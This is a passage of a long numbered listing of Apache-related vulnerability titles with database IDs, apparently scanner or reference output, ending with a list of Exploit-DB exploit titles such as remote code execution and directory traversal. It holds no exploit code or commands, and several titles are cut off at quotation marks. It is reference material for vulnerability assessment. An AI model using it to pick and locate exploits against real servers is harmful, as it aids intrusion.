15577| [70336] Apache HTTP Server mod_proxy information disclosure
15578| [69804] Apache HTTP Server mod_proxy_ajp denial of service
15579| [69472] Apache Tomcat AJP security bypass
15580| [69396] Apache HTTP Server ByteRange filter denial of service
15581| [69394] Apache Wicket multi window support cross-site scripting
15582| [69176] Apache Tomcat XML information disclosure
15583| [69161] Apache Tomcat jsvc information disclosure
15584| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
15585| [68541] Apache Tomcat sendfile information disclosure
15586| [68420] Apache XML Security denial of service
15587| [68238] Apache Tomcat JMX information disclosure
15588| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
15589| [67804] Apache Subversion control rules information disclosure
15590| [67803] Apache Subversion control rules denial of service
15591| [67802] Apache Subversion baselined denial of service
15592| [67672] Apache Archiva multiple cross-site scripting
15593| [67671] Apache Archiva multiple cross-site request forgery
15594| [67564] Apache APR apr_fnmatch() denial of service
15595| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
15596| [67515] Apache Tomcat annotations security bypass
15597| [67480] Apache Struts s:submit information disclosure
15598| [67414] Apache APR apr_fnmatch() denial of service
15599| [67356] Apache Struts javatemplates cross-site scripting
15600| [67354] Apache Struts Xwork cross-site scripting
15601| [66676] Apache Tomcat HTTP BIO information disclosure
15602| [66675] Apache Tomcat web.xml security bypass
15603| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
15604| [66241] Apache HttpComponents information disclosure
15605| [66154] Apache Tomcat ServletSecurity security bypass
15606| [65971] Apache Tomcat ServletSecurity security bypass
15607| [65876] Apache Subversion mod_dav_svn denial of service
15608| [65343] Apache Continuum unspecified cross-site scripting
15609| [65162] Apache Tomcat NIO connector denial of service
15610| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
15611| [65160] Apache Tomcat HTML Manager interface cross-site scripting
15612| [65159] Apache Tomcat ServletContect security bypass
15613| [65050] Apache CouchDB web-based administration UI cross-site scripting
15614| [64773] Oracle HTTP Server Apache Plugin unauthorized access
15615| [64473] Apache Subversion blame -g denial of service
15616| [64472] Apache Subversion walk() denial of service
15617| [64407] Apache Axis2 CVE-2010-0219 code execution
15618| [63926] Apache Archiva password privilege escalation
15619| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
15620| [63493] Apache Archiva credentials cross-site request forgery
15621| [63477] Apache Tomcat HttpOnly session hijacking
15622| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
15623| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
15624| [62959] Apache Shiro filters security bypass
15625| [62790] Apache Perl cgi module denial of service
15626| [62576] Apache Qpid exchange denial of service
15627| [62575] Apache Qpid AMQP denial of service
15628| [62354] Apache Qpid SSL denial of service
15629| [62235] Apache APR-util apr_brigade_split_line() denial of service
15630| [62181] Apache XML-RPC SAX Parser information disclosure
15631| [61721] Apache Traffic Server cache poisoning
15632| [61202] Apache Derby BUILTIN authentication functionality information disclosure
15633| [61186] Apache CouchDB Futon cross-site request forgery
15634| [61169] Apache CXF DTD denial of service
15635| [61070] Apache Jackrabbit search.jsp SQL injection
15636| [61006] Apache SLMS Quoting cross-site request forgery
15637| [60962] Apache Tomcat time cross-site scripting
15638| [60883] Apache mod_proxy_http information disclosure
15639| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
15640| [60264] Apache Tomcat Transfer-Encoding denial of service
15641| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
15642| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
15643| [59413] Apache mod_proxy_http timeout information disclosure
15644| [59058] Apache MyFaces unencrypted view state cross-site scripting
15645| [58827] Apache Axis2 xsd file include
15646| [58790] Apache Axis2 modules cross-site scripting
15647| [58299] Apache ActiveMQ queueBrowse cross-site scripting
15648| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
15649| [58056] Apache ActiveMQ .jsp source code disclosure
15650| [58055] Apache Tomcat realm name information disclosure
15651| [58046] Apache HTTP Server mod_auth_shadow security bypass
15652| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
15653| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
15654| [57429] Apache CouchDB algorithms information disclosure
15655| [57398] Apache ActiveMQ Web console cross-site request forgery
15656| [57397] Apache ActiveMQ createDestination.action cross-site scripting
15657| [56653] Apache HTTP Server DNS spoofing
15658| [56652] Apache HTTP Server DNS cross-site scripting
15659| [56625] Apache HTTP Server request header information disclosure
15660| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
15661| [56623] Apache HTTP Server mod_proxy_ajp denial of service
15662| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
15663| [55857] Apache Tomcat WAR files directory traversal
15664| [55856] Apache Tomcat autoDeploy attribute security bypass
15665| [55855] Apache Tomcat WAR directory traversal
15666| [55210] Intuit component for Joomla! Apache information disclosure
15667| [54533] Apache Tomcat 404 error page cross-site scripting
15668| [54182] Apache Tomcat admin default password
15669| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
15670| [53666] Apache HTTP Server Solaris pollset support denial of service
15671| [53650] Apache HTTP Server HTTP basic-auth module security bypass
15672| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
15673| [53041] mod_proxy_ftp module for Apache denial of service
15674| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
15675| [51953] Apache Tomcat Path Disclosure
15676| [51952] Apache Tomcat Path Traversal
15677| [51951] Apache stronghold-status Information Disclosure
15678| [51950] Apache stronghold-info Information Disclosure
15679| [51949] Apache PHP Source Code Disclosure
15680| [51948] Apache Multiviews Attack
15681| [51946] Apache JServ Environment Status Information Disclosure
15682| [51945] Apache error_log Information Disclosure
15683| [51944] Apache Default Installation Page Pattern Found
15684| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
15685| [51942] Apache AXIS XML External Entity File Retrieval
15686| [51941] Apache AXIS Sample Servlet Information Leak
15687| [51940] Apache access_log Information Disclosure
15688| [51626] Apache mod_deflate denial of service
15689| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
15690| [51365] Apache Tomcat RequestDispatcher security bypass
15691| [51273] Apache HTTP Server Incomplete Request denial of service
15692| [51195] Apache Tomcat XML information disclosure
15693| [50994] Apache APR-util xml/apr_xml.c denial of service
15694| [50993] Apache APR-util apr_brigade_vprintf denial of service
15695| [50964] Apache APR-util apr_strmatch_precompile() denial of service
15696| [50930] Apache Tomcat j_security_check information disclosure
15697| [50928] Apache Tomcat AJP denial of service
15698| [50884] Apache HTTP Server XML ENTITY denial of service
15699| [50808] Apache HTTP Server AllowOverride privilege escalation
15700| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
15701| [50059] Apache mod_proxy_ajp information disclosure
15702| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
15703| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
15704| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
15705| [49921] Apache ActiveMQ Web interface cross-site scripting
15706| [49898] Apache Geronimo Services/Repository directory traversal
15707| [49725] Apache Tomcat mod_jk module information disclosure
15708| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
15709| [49712] Apache Struts unspecified cross-site scripting
15710| [49213] Apache Tomcat cal2.jsp cross-site scripting
15711| [48934] Apache Tomcat POST doRead method information disclosure
15712| [48211] Apache Tomcat header HTTP request smuggling
15713| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
15714| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
15715| [47709] Apache Roller "
15716| [47104] Novell Netware ApacheAdmin console security bypass
15717| [47086] Apache HTTP Server OS fingerprinting unspecified
15718| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
15719| [45791] Apache Tomcat RemoteFilterValve security bypass
15720| [44435] Oracle WebLogic Apache Connector buffer overflow
15721| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
15722| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
15723| [44156] Apache Tomcat RequestDispatcher directory traversal
15724| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
15725| [43885] Oracle WebLogic Server Apache Connector buffer overflow
15726| [42987] Apache HTTP Server mod_proxy module denial of service
15727| [42915] Apache Tomcat JSP files path disclosure
15728| [42914] Apache Tomcat MS-DOS path disclosure
15729| [42892] Apache Tomcat unspecified unauthorized access
15730| [42816] Apache Tomcat Host Manager cross-site scripting
15731| [42303] Apache 403 error cross-site scripting
15732| [41618] Apache-SSL ExpandCert() authentication bypass
15733| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
15734| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
15735| [40614] Apache mod_jk2 HTTP Host header buffer overflow
15736| [40562] Apache Geronimo init information disclosure
15737| [40478] Novell Web Manager webadmin-apache.conf security bypass
15738| [40411] Apache Tomcat exception handling information disclosure
15739| [40409] Apache Tomcat native (APR based) connector weak security
15740| [40403] Apache Tomcat quotes and %5C cookie information disclosure
15741| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
15742| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
15743| [39867] Apache HTTP Server mod_negotiation cross-site scripting
15744| [39804] Apache Tomcat SingleSignOn information disclosure
15745| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
15746| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
15747| [39608] Apache HTTP Server balancer manager cross-site request forgery
15748| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
15749| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
15750| [39472] Apache HTTP Server mod_status cross-site scripting
15751| [39201] Apache Tomcat JULI logging weak security
15752| [39158] Apache HTTP Server Windows SMB shares information disclosure
15753| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
15754| [38951] Apache::AuthCAS Perl module cookie SQL injection
15755| [38800] Apache HTTP Server 413 error page cross-site scripting
15756| [38211] Apache Geronimo SQLLoginModule authentication bypass
15757| [37243] Apache Tomcat WebDAV directory traversal
15758| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
15759| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
15760| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
15761| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
15762| [36782] Apache Geronimo MEJB unauthorized access
15763| [36586] Apache HTTP Server UTF-7 cross-site scripting
15764| [36468] Apache Geronimo LoginModule security bypass
15765| [36467] Apache Tomcat functions.jsp cross-site scripting
15766| [36402] Apache Tomcat calendar cross-site request forgery
15767| [36354] Apache HTTP Server mod_proxy module denial of service
15768| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
15769| [36336] Apache Derby lock table privilege escalation
15770| [36335] Apache Derby schema privilege escalation
15771| [36006] Apache Tomcat "
15772| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
15773| [35999] Apache Tomcat \"
15774| [35795] Apache Tomcat CookieExample cross-site scripting
15775| [35536] Apache Tomcat SendMailServlet example cross-site scripting
15776| [35384] Apache HTTP Server mod_cache module denial of service
15777| [35097] Apache HTTP Server mod_status module cross-site scripting
15778| [35095] Apache HTTP Server Prefork MPM module denial of service
15779| [34984] Apache HTTP Server recall_headers information disclosure
15780| [34966] Apache HTTP Server MPM content spoofing
15781| [34965] Apache HTTP Server MPM information disclosure
15782| [34963] Apache HTTP Server MPM multiple denial of service
15783| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
15784| [34869] Apache Tomcat JSP example Web application cross-site scripting
15785| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
15786| [34496] Apache Tomcat JK Connector security bypass
15787| [34377] Apache Tomcat hello.jsp cross-site scripting
15788| [34212] Apache Tomcat SSL configuration security bypass
15789| [34210] Apache Tomcat Accept-Language cross-site scripting
15790| [34209] Apache Tomcat calendar application cross-site scripting
15791| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
15792| [34167] Apache Axis WSDL file path disclosure
15793| [34068] Apache Tomcat AJP connector information disclosure
15794| [33584] Apache HTTP Server suEXEC privilege escalation
15795| [32988] Apache Tomcat proxy module directory traversal
15796| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
15797| [32708] Debian Apache tty privilege escalation
15798| [32441] ApacheStats extract() PHP call unspecified
15799| [32128] Apache Tomcat default account
15800| [31680] Apache Tomcat RequestParamExample cross-site scripting
15801| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
15802| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
15803| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
15804| [30456] Apache mod_auth_kerb off-by-one buffer overflow
15805| [29550] Apache mod_tcl set_var() format string
15806| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
15807| [28357] Apache HTTP Server mod_alias script source information disclosure
15808| [28063] Apache mod_rewrite off-by-one buffer overflow
15809| [27902] Apache Tomcat URL information disclosure
15810| [26786] Apache James SMTP server denial of service
15811| [25680] libapache2 /tmp/svn file upload
15812| [25614] Apache Struts lookupMap cross-site scripting
15813| [25613] Apache Struts ActionForm denial of service
15814| [25612] Apache Struts isCancelled() security bypass
15815| [24965] Apache mod_python FileSession command execution
15816| [24716] Apache James spooler memory leak denial of service
15817| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
15818| [24158] Apache Geronimo jsp-examples cross-site scripting
15819| [24030] Apache auth_ldap module multiple format strings
15820| [24008] Apache mod_ssl custom error message denial of service
15821| [24003] Apache mod_auth_pgsql module multiple syslog format strings
15822| [23612] Apache mod_imap referer field cross-site scripting
15823| [23173] Apache Struts error message cross-site scripting
15824| [22942] Apache Tomcat directory listing denial of service
15825| [22858] Apache Multi-Processing Module code allows denial of service
15826| [22602] RHSA-2005:582 updates for Apache httpd not installed
15827| [22520] Apache mod-auth-shadow "
15828| [22466] ApacheTop symlink
15829| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
15830| [22006] Apache HTTP Server byte-range filter denial of service
15831| [21567] Apache mod_ssl off-by-one buffer overflow
15832| [21195] Apache HTTP Server header HTTP request smuggling
15833| [20383] Apache HTTP Server htdigest buffer overflow
15834| [19681] Apache Tomcat AJP12 request denial of service
15835| [18993] Apache HTTP server check_forensic symlink attack
15836| [18790] Apache Tomcat Manager cross-site scripting
15837| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
15838| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
15839| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
15840| [17961] Apache Web server ServerTokens has not been set
15841| [17930] Apache HTTP Server HTTP GET request denial of service
15842| [17785] Apache mod_include module buffer overflow
15843| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
15844| [17473] Apache HTTP Server Satisfy directive allows access to resources
15845| [17413] Apache htpasswd buffer overflow
15846| [17384] Apache HTTP Server environment variable configuration file buffer overflow
15847| [17382] Apache HTTP Server IPv6 apr_util denial of service
15848| [17366] Apache HTTP Server mod_dav module LOCK denial of service
15849| [17273] Apache HTTP Server speculative mode denial of service
15850| [17200] Apache HTTP Server mod_ssl denial of service
15851| [16890] Apache HTTP Server server-info request has been detected
15852| [16889] Apache HTTP Server server-status request has been detected
15853| [16705] Apache mod_ssl format string attack
15854| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
15855| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
15856| [16230] Apache HTTP Server PHP denial of service
15857| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
15858| [15958] Apache HTTP Server authentication modules memory corruption
15859| [15547] Apache HTTP Server mod_disk_cache local information disclosure
15860| [15540] Apache HTTP Server socket starvation denial of service
15861| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
15862| [15422] Apache HTTP Server mod_access information disclosure
15863| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
15864| [15293] Apache for Cygwin "
15865| [15065] Apache-SSL has a default password
15866| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
15867| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
15868| [14751] Apache Mod_python output filter information disclosure
15869| [14125] Apache HTTP Server mod_userdir module information disclosure
15870| [14075] Apache HTTP Server mod_php file descriptor leak
15871| [13703] Apache HTTP Server account
15872| [13689] Apache HTTP Server configuration allows symlinks
15873| [13688] Apache HTTP Server configuration allows SSI
15874| [13687] Apache HTTP Server Server: header value
15875| [13685] Apache HTTP Server ServerTokens value
15876| [13684] Apache HTTP Server ServerSignature value
15877| [13672] Apache HTTP Server config allows directory autoindexing
15878| [13671] Apache HTTP Server default content
15879| [13670] Apache HTTP Server config file directive references outside content root
15880| [13668] Apache HTTP Server httpd not running in chroot environment
15881| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
15882| [13664] Apache HTTP Server config file contains ScriptAlias entry
15883| [13663] Apache HTTP Server CGI support modules loaded
15884| [13661] Apache HTTP Server config file contains AddHandler entry
15885| [13660] Apache HTTP Server 500 error page not CGI script
15886| [13659] Apache HTTP Server 413 error page not CGI script
15887| [13658] Apache HTTP Server 403 error page not CGI script
15888| [13657] Apache HTTP Server 401 error page not CGI script
15889| [13552] Apache HTTP Server mod_cgid module information disclosure
15890| [13550] Apache GET request directory traversal
15891| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
15892| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
15893| [13429] Apache Tomcat non-HTTP request denial of service
15894| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
15895| [13295] Apache weak password encryption
15896| [13254] Apache Tomcat .jsp cross-site scripting
15897| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
15898| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
15899| [12681] Apache HTTP Server mod_proxy could allow mail relaying
15900| [12662] Apache HTTP Server rotatelogs denial of service
15901| [12554] Apache Tomcat stores password in plain text
15902| [12553] Apache HTTP Server redirects and subrequests denial of service
15903| [12552] Apache HTTP Server FTP proxy server denial of service
15904| [12551] Apache HTTP Server prefork MPM denial of service
15905| [12550] Apache HTTP Server weaker than expected encryption
15906| [12549] Apache HTTP Server type-map file denial of service
15907| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
15908| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
15909| [12091] Apache HTTP Server apr_password_validate denial of service
15910| [12090] Apache HTTP Server apr_psprintf code execution
15911| [11804] Apache HTTP Server mod_access_referer denial of service
15912| [11750] Apache HTTP Server could leak sensitive file descriptors
15913| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
15914| [11703] Apache long slash path allows directory listing
15915| [11695] Apache HTTP Server LF (Line Feed) denial of service
15916| [11694] Apache HTTP Server filestat.c denial of service
15917| [11438] Apache HTTP Server MIME message boundaries information disclosure
15918| [11412] Apache HTTP Server error log terminal escape sequence injection
15919| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
15920| [11195] Apache Tomcat web.xml could be used to read files
15921| [11194] Apache Tomcat URL appended with a null character could list directories
15922| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
15923| [11126] Apache HTTP Server illegal character file disclosure
15924| [11125] Apache HTTP Server DOS device name HTTP POST code execution
15925| [11124] Apache HTTP Server DOS device name denial of service
15926| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
15927| [10938] Apache HTTP Server printenv test CGI cross-site scripting
15928| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
15929| [10575] Apache mod_php module could allow an attacker to take over the httpd process
15930| [10499] Apache HTTP Server WebDAV HTTP POST view source
15931| [10457] Apache HTTP Server mod_ssl "
15932| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
15933| [10414] Apache HTTP Server htdigest multiple buffer overflows
15934| [10413] Apache HTTP Server htdigest temporary file race condition
15935| [10412] Apache HTTP Server htpasswd temporary file race condition
15936| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
15937| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
15938| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
15939| [10280] Apache HTTP Server shared memory scorecard overwrite
15940| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
15941| [10241] Apache HTTP Server Host: header cross-site scripting
15942| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
15943| [10208] Apache HTTP Server mod_dav denial of service
15944| [10206] HP VVOS Apache mod_ssl denial of service
15945| [10200] Apache HTTP Server stderr denial of service
15946| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
15947| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
15948| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
15949| [10098] Slapper worm targets OpenSSL/Apache systems
15950| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
15951| [9875] Apache HTTP Server .var file request could disclose installation path
15952| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
15953| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
15954| [9623] Apache HTTP Server ap_log_rerror() path disclosure
15955| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
15956| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
15957| [9396] Apache Tomcat null character to threads denial of service
15958| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
15959| [9249] Apache HTTP Server chunked encoding heap buffer overflow
15960| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
15961| [8932] Apache Tomcat example class information disclosure
15962| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
15963| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
15964| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
15965| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
15966| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
15967| [8400] Apache HTTP Server mod_frontpage buffer overflows
15968| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
15969| [8308] Apache "
15970| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
15971| [8119] Apache and PHP OPTIONS request reveals "
15972| [8054] Apache is running on the system
15973| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
15974| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
15975| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
15976| [7836] Apache HTTP Server log directory denial of service
15977| [7815] Apache for Windows "
15978| [7810] Apache HTTP request could result in unexpected behavior
15979| [7599] Apache Tomcat reveals installation path
15980| [7494] Apache "
15981| [7419] Apache Web Server could allow remote attackers to overwrite .log files
15982| [7363] Apache Web Server hidden HTTP requests
15983| [7249] Apache mod_proxy denial of service
15984| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
15985| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
15986| [7059] Apache "
15987| [7057] Apache "
15988| [7056] Apache "
15989| [7055] Apache "
15990| [7054] Apache "
15991| [6997] Apache Jakarta Tomcat error message may reveal information
15992| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
15993| [6970] Apache crafted HTTP request could reveal the internal IP address
15994| [6921] Apache long slash path allows directory listing
15995| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
15996| [6527] Apache Web Server for Windows and OS2 denial of service
15997| [6316] Apache Jakarta Tomcat may reveal JSP source code
15998| [6305] Apache Jakarta Tomcat directory traversal
15999| [5926] Linux Apache symbolic link
16000| [5659] Apache Web server discloses files when used with php script
16001| [5310] Apache mod_rewrite allows attacker to view arbitrary files
16002| [5204] Apache WebDAV directory listings
16003| [5197] Apache Web server reveals CGI script source code
16004| [5160] Apache Jakarta Tomcat default installation
16005| [5099] Trustix Secure Linux installs Apache with world writable access
16006| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
16007| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
16008| [4931] Apache source.asp example file allows users to write to files
16009| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
16010| [4205] Apache Jakarta Tomcat delivers file contents
16011| [2084] Apache on Debian by default serves the /usr/doc directory
16012| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
16013| [697] Apache HTTP server beck exploit
16014| [331] Apache cookies buffer overflow
16015|
16016| Exploit-DB - https://www.exploit-db.com:
16017| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
16018| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
16019| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
16020| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
16021| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
16022| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
16023| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
16024| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
16025| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
16026| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
16027| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
16028| [29859] Apache Roller OGNL Injection
16029| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
16030| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
16031| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
16032| [29290] Apache / PHP 5.x Remote Code Execution Exploit
16033| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
16034| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
16035| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
16036| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
16037| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
16038| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
16039| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
16040| [27096] Apache Geronimo 1.0 Error Page XSS
16041| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
16042| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
16043| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
16044| [25986] Plesk Apache Zeroday Remote Exploit
16045| [25980] Apache Struts includeParams Remote Code Execution
16046| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
16047| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
16048| [24874] Apache Struts ParametersInterceptor Remote Code Execution
16049| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
16050| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
16051| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
16052| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
16053| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
16054| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
16055| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
16056| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
16057| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
16058| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
16059| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
16060| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
16061| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
16062| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
16063| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
16064| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
16065| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
16066| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
16067| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
16068| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
16069| [21719] Apache 2.0 Path Disclosure Vulnerability
16070| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
16071| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
16072| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
16073| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
16074| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
16075| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
